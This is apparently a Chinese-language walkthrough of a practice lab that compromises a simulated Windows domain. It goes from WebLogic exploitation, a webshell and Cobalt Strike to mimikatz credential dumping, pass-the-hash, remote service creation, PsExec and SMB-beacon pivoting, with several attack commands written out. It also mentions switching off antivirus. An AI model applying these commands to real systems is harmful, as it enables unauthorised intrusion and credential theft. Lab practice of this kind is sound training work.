红日靶场2

靶场环境

攻击机器：192.168.142.133（模拟外网）

PC机器：192.168.142.210（模拟外网）、192.168.140.210（模拟内网）

WEB机器：192.168.142.230（模拟外网）、192.168.140.230（模拟内网）

DC机器：192.168.140.220（模拟内网）

（1）通过arp-scan命令探测存活主机

arp-scan -l

（2）发现存在192.168.142.210、192.168.142.230存活，使用nmap进行端口探测

nmap -sV -Pn 192.168.142.210

nmap -sV -Pn 192.168.142.230

（3）发现192.168.142.230主机开放的web服务，尝试访问80端口，啥也没有，尝试访问7001端口

（4）使用Weblogic漏洞检测工具进行检测，成功发现漏洞

（5）尝试使用内存马注入，用冰蝎上线

（6）成功上线冰蝎

（7）只是普通域用户，需要提权，生成后门尝试上线到CS

（8）成功上线CS，通过CS进行提权

（9）没一分钟被360查杀了，尝试使用msf免杀，上传到WEB机器

（10）尝试了msf免杀，CS插件免杀、加壳等，一直被查杀。直接把360关了，以后学习了免杀再来对付。

（11）重新上线CS，继续往下探索。使用CS自带提权工具提权拿到system权限

（12）查看用户信息

（13）使用mimikatz抓取密码、NTLM哈希，直接抓到明文了（我记得Windows2012之后就已经抓不到明文了）

（14）拿到明文密码后，建立IPC连接进行横向

（15）测试是否可以远程查看文件夹

shell dir \\192.168.140.220\c$

（16）尝试计划任务、系统服务上线DC机器

方法一：使用系统服务上线（未成功）

shell copy candada.exe \\192.168.140.220\C$
shell sc \\192.168.140.220 create test binpath= "cmd.exe /c c:\candada.exe"
shell sc \\192.168.140.220 start test

方法二：使用计划任务上线（未成功）

（17）尝试PTH横向

方法一：使用mimikatz进行PTH横向（需要远程登录到WEB机器才能下一步操作），再通过todesk、gotohttp、rustdesk等远程工具或者3389远程控制进行操作

mimikatz sekurlsa::pth /user:administrator /domain:de1ay.com /ntlm:161cff084477fe596a5db81874498a24

方法二：使用CS自带的PTH直接上线，又出现了问题。我在address中没有发现存在192.168.140.220（DC机器），通过net view命令，也没办法探测。

（18）因为计划任务、系统服务都没办法成功上线DC机器，PTH、PTK、PTT攻击都需要配合计划任务或者系统服务上线DC机器，只能尝试其他横向的办法了。

尝试使用IPC配合PsExec上线CS

成功了，但是DC机器没有上线到CS，突然意识到，DC机器可能不出网，导致没办法回连。那之前计划任务、系统服务上线DC机器的没反应，有可能也是因为不出网的原因。

（19）目前掌握CS不出网的技术有SMB-Beacon上线、TCP-Beacon上线、http代理技术+端口转发技术、CS中转技术

SMB-Beacon上线（成功）

TCP-Beacon上线（失败）

http代理技术+端口转发技术（成功）

CS中转技术（成功）

（20）拿下域控后，PC机器通过IPC横向配合PsExec拿下

基本流程：

arp-scan主机探测-》nmap端口探测-》通过Weblogic工具发现漏洞并利用内存马注入-》通过冰蝎连接拿到shell-》上线CS进行提权-》通过system权限抓取密码-》拿到密码后IPC横向-》通过IPC横向配合计划任务-》系统服务上线CS-》发现DC机器不出网-》通过SMB-Beacon、TCP-Beacon、HTTP代理+端口转发、CS中转技术上线DC机器-》IPC横向+PsExec上线PC机器

不足：

（1）在打靶过程中，不会免杀技术，上传的CS马和msf马一下就被查杀。

（2）CS想通过PTH上线时，拿到了NTLM哈希值，但是发现找不到主机，net view命令也执行不了。